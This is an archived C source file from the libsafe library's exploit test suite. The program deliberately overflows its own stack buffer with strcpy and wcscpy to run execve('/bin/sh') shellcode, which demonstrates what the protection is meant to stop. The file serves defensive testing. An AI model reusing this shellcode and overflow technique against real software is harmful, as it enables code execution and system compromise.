"Fossies" - the Fresh Open Source Software Archive

Member "libsafe-2.0-16/exploits/t4w.c" (12 Jun 2002, 2020 Bytes) of package /linux/misc/old/libsafe-2.0-16.tgz:

As a special service "Fossies" has tried to format the requested source page into HTML format using (guessed) C and C++ source code syntax highlighting (style: standard) with prefixed line numbers and code folding option. Alternatively you can here view or download the uninterpreted source code file. 
    1 /*
    2  * $Name: release2_0-16 $
    3  * $Id: t4w.c,v 1.2 2002/06/12 20:30:37 ttsai Exp $
    4  */
    5 
    6 
    7 #include <sys/types.h>
    8 #include <sys/wait.h>
    9 #include <unistd.h>
   10 #include <stdio.h>
   11 #include <string.h>
   12 #include <stdlib.h>
   13 #include <wchar.h>
   14 
   15 char shellcode[] =
   16     "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
   17     "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
   18     "\x80\xe8\xdc\xff\xff\xff/bin/sh";
   19 
   20 char large_string[128];
   21 
   22 /*
   23  * Return 1 if at least one of the bytes in addr is 0x00; else return 0.
   24  */
   25 int contains_null_bytes(caddr_t addrp) {
   26     uint addr = (uint) addrp;
   27     return !(addr & 0xff &&
   28          addr & 0xff00 &&
   29          addr & 0xff0000 &&
   30          addr & 0xff000000);
   31 }
   32 
   33 void foo()
   34 {
   35     char buffer[96], *p;
   36     long *long_ptr = (long *) large_string;
   37     int i;
   38 
   39     /*
   40      * Make sure that there are no zero bytes in the starting address in
   41      * buffer[].  If so, find the first address containing no zero bytes.
   42      */
   43     for (p=buffer; contains_null_bytes(p); p++);
   44     if (contains_null_bytes(p)) {
   45     printf("We can't find an acceptable address that doesn't\n");
   46     printf("contain a zero byte.  Giving up.\n");
   47     exit(-1);
   48     }
   49 
   50     for (i = 0; i < 32; i++)
   51     *(long_ptr + i) = (int) p;
   52     for (i = 0; i < sizeof(shellcode)-1; i++)
   53     large_string[i] = shellcode[i];
   54     strcpy(p, large_string);
   55     wcscpy((wchar_t*)buffer, (wchar_t*)large_string);
   56 
   57     return;
   58 }
   59 
   60 int main(int ac, char *av[])
   61 {
   62     int res;
   63 
   64     printf("This program will fork() child process, and the child\n");
   65     printf("will overflow the buffer using strcpy().\n");
   66     printf("If you get a /bin/sh prompt, then the exploit has worked.\n");
   67     printf("Press any key to continue...");
   68     getchar();
   69 
   70     if ((res = fork()) == -1) {
   71     perror("fork()");
   72     exit(1);
   73     } else if (res == 0) {
   74     foo();
   75 
   76     printf("If you see this statement, it means that the buffer\n");
   77     printf("overflow never occurred.\n");
   78 
   79     return 0;
   80     }
   81     wait(&res);
   82     printf("parent process terminating\n");
   83     return 0;
   84 }